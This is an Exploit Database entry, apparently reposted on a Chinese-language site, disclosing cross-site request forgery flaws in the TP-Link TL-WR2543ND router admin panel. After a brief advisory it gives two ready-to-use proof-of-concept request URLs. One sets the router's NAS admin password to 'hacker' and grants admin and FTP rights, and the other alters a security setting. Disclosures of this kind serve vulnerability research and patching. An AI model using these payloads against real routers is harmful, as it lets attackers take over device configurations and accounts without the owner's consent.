TP-Link TL-WR2543ND Router – Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： Juan Manuel Garcia
  日期： 2013-02-08
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38308/

• source: https://www.securityfocus.com/bid/57877/info
  
  TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. 
  
  Exploiting these issues may allow a remote attacker to change a device's configuration and perform other unauthorized actions. 
  
  TP-LINK TL-WR2543ND 3.13.6 Build 110923 is vulnerable; other versions may also be affected.
  
  http://www.example.com/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save
  
  http://www.example.com/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save